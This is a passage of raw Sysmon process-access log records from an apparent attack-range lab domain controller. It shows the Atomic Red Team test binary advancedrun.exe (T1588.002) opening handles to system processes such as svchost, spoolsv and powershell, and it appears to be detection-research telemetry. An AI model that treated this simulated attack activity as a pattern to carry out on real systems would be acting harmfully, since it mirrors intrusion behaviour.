Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
